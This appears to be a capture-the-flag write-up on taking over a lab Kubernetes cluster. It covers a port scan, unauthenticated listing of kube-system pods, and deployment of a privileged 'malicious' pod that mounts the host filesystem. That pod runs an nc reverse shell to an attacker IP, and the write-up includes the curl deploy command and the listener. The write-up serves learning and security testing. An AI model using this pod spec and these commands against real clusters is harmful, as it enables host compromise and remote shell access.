Rating: 1.0

# Introduction

The entrypoint was just an IP address. For us, it was 10.129.95.171.
It supposed to be an address to a Kubernetes cluster.

# Recon

A `nmap` scan`gives us the following opened TCP:

- 22/tcp
- 2379/tcp
- 2380/tcp
- 8443/tcp
- 10249/tcp
- 10250/tcp
- 10256/tcp

We recognize classic TCP ports of a Kubernetes environment:
- 10249, 10250: kubelet (Access to nodes)
- 10256: health check for Kube Proxy
- 2379, 2380: etcd (key/value store for the cluster)

By default the Kubernetes API server is accessible on TCP port 6443. But for this challenge, it is on the port 8443. The API endpoint `curl https://10.129.95.171:8443/api/v1/version` returns version information about the Kubernetes environment.

# Analysis

In Kubernetes, there are `resource`, identified by name (`pod`, `configmaps`, `secret`, ...) on which an authenticated or an unauthenticated user can list and/or create and/or update and/or delete. Kubernetes have also a system of `namespace` to separate environments.

Kubernetes have 4 defaults namespaces:

- `default`
- `kube-node-lease`
- `kube-public`
- `kube-system`

It could be interesting to access or manipulate the ressources inside `kube-system` namespace because this operation can lead to sensitive data leaks or breaks.

After a try to access

Two interesting resources : `secret` and `pod`. `secret` to retrieve, for example, access token to some resources, `pod` to, for example, deploy new pod into the namespace.

```bash
curl -k \
-X GET \
-H 'Accept: application/json' \
https://10.129.172.188:8443/api/v1/namespaces/kube-system/pods/
```

Return the list of pods. This is problematic because unauthenticated users should not access to this part.

Extract:

```json
{
"kind": "PodList",
"apiVersion": "v1",
"metadata": {
"resourceVersion": "99232"
},
"items": [
{
"metadata": {
"name": "alpine",
"namespace": "kube-system",
"uid": "29eb87f5-305c-4f20-b668-469d79200118",
"resourceVersion": "98964",
"creationTimestamp": "2021-07-21T20:32:48Z",
"managedFields": [
(...)
},
"spec": {
"volumes": [
{
"name": "mount-root-into-mnt",
"hostPath": {
"path": "/",
"type": ""
}
}
(...)
"containerStatuses": [
{
"name": "alpine",
"state": {
"waiting": {
"reason": "ImagePullBackOff",
"message": "Back-off pulling image \"alpine\""
}
},
"lastState": {
"terminated": {
"exitCode": 137,
"reason": "Error",
"startedAt": "2021-07-21T20:32:51Z",
"finishedAt": "2021-07-21T20:33:52Z",
"containerID": "docker://c80ad77181ccd49c64c177eef8c459e6c4b27fc5ff06f74ce4ffb22540cb2823"
}
},
"ready": false,
"restartCount": 0,
"image": "alpine:latest",
"imageID": "docker-pullable://alpine@sha256:234cb88d3020898631af0ccbbcca9a66ae7306ecd30c9720690858c1b007d2a0",
"containerID": "docker://c80ad77181ccd49c64c177eef8c459e6c4b27fc5ff06f74ce4ffb22540cb2823",
"started": false
}
],
"qosClass": "BestEffort"
}
},
(...)
{
"metadata": {
"name": "kube-apiserver-kube",
"namespace": "kube-system",
"uid": "3a6c1104-409c-40ca-97e3-ecbea533f1ea",
"resourceVersion": "94732",
"creationTimestamp": "2021-07-24T08:55:50Z",
"labels": {
"component": "kube-apiserver",
"tier": "control-plane"
},
"annotations": {
"kubeadm.kubernetes.io/kube-apiserver.advertise-address.endpoint": "10.129.172.188:8443",
"kubernetes.io/config.hash": "c132183c5af205ba7fc881492a31db77",
"kubernetes.io/config.mirror": "c132183c5af205ba7fc881492a31db77",
"kubernetes.io/config.seen": "2021-07-24T04:55:34.703087177-04:00",
"kubernetes.io/config.source": "file"
},
"ownerReferences": [
{
"apiVersion": "v1",
"kind": "Node",
"name": "kube",
"uid": "a8d9a8e7-ee8e-4596-8c2d-32d5a6e3ea21",
"controller": true
}
],
(...)
"containers": [
{
"name": "kube-apiserver",
"image": "k8s.gcr.io/kube-apiserver:v1.21.2",
"command": [
"kube-apiserver",
"--advertise-address=10.129.172.188",
"--allow-privileged=true",
"--anonymous-auth=true",
"--authorization-mode=Node,RBAC",
"--client-ca-file=/var/lib/minikube/certs/ca.crt",
"--enable-admission-plugins=NamespaceLifecycle,LimitRanger,ServiceAccount,DefaultStorageClass,DefaultTolerationSeconds,NodeRestriction,MutatingAdmissionWebhook,ValidatingAdmissionWebhook,ResourceQuota",
"--enable-bootstrap-token-auth=true",
"--etcd-cafile=/var/lib/minikube/certs/etcd/ca.crt",
"--etcd-certfile=/var/lib/minikube/certs/apiserver-etcd-client.crt",
"--etcd-keyfile=/var/lib/minikube/certs/apiserver-etcd-client.key",
"--etcd-servers=https://127.0.0.1:2379",
"--insecure-port=0",
"--kubelet-client-certificate=/var/lib/minikube/certs/apiserver-kubelet-client.crt",
"--kubelet-client-key=/var/lib/minikube/certs/apiserver-kubelet-client.key",
"--kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname",
"--proxy-client-cert-file=/var/lib/minikube/certs/front-proxy-client.crt",
"--proxy-client-key-file=/var/lib/minikube/certs/front-proxy-client.key",
"--requestheader-allowed-names=front-proxy-client",
"--requestheader-client-ca-file=/var/lib/minikube/certs/front-proxy-ca.crt",
"--requestheader-extra-headers-prefix=X-Remote-Extra-",
"--requestheader-group-headers=X-Remote-Group",
"--requestheader-username-headers=X-Remote-User",
"--secure-port=8443",
"--service-account-issuer=https://kubernetes.default.svc.cluster.local",
"--service-account-key-file=/var/lib/minikube/certs/sa.pub",
"--service-account-signing-key-file=/var/lib/minikube/certs/sa.key",
"--service-cluster-ip-range=10.96.0.0/12",
"--tls-cert-file=/var/lib/minikube/certs/apiserver.crt",
"--tls-private-key-file=/var/lib/minikube/certs/apiserver.key"
],
"resources": {
"requests": {
"cpu": "250m"
}
},
(...)
```

# Pod deployment exploit

A lot of exploit methods exists. Maybe there are others than the one I tried for this challenge.

I try to deploy a new pod in the namespace with system privileges.

The encountered problem is that the cluster does not seems to have access to every Docker registry (Kind of restricted Minikube registry but smaller ?).
So I reuse a known image I could easily exploit: I see an `alpine` image in the pods list and it could be a great beginning:

```json
"image": "alpine:latest",
"imageID": "docker-pullable://alpine@sha256:234cb88d3020898631af0ccbbcca9a66ae7306ecd30c9720690858c1b007d2a0",
"containerID": "docker://c80ad77181ccd49c64c177eef8c459e6c4b27fc5ff06f74ce4ffb22540cb2823",
```

I build a malicious pod configuration:

```json
{
"apiVersion": "v1",
"kind": "Pod",
"metadata": {
"name": "malicious"
},
"spec": {
"containers": [{
"name": "malicious-container",
"image": "alpine@sha256:234cb88d3020898631af0ccbbcca9a66ae7306ecd30c9720690858c1b007d2a0",
"command": ["sh"],
"args": ["-c", "nc 10.10.14.192 4444 -e /bin/sh"],
"securityContext": {
"privileged": true
},
"serviceAccountName": "default",
"automountServiceAccountToken": true,
"hostNetwork": true
}],
"volumes": [{
"name":"noderoot",
"hostpath":"/"
}]
}
}
```

In this one:

- `privileged: true`: add all capabilities, included the system caps to interact with the host system.
- `volumes` section: mount the `/` host system.
- `args`: execute `nc` on load to open a reverse shell. NB: `nc` is installed by default in `alpine` images!

So, first on my computer: `nc -nlvp 4444`.

Then, run the deployment:

```bash
curl -k \
-X POST \
-H 'Accept: application/json' \
https://10.129.172.188:8443/api/v1/namespaces/kube-system/pods/ \
--data-binary "@/path/to/malicious-pod.json"
```

And we got a shell!

Fine, now we can just navigate in the mounted host filesystem from the container and search for the flag file (I do not have kept the flag so I cannot publish it it anymore). Done!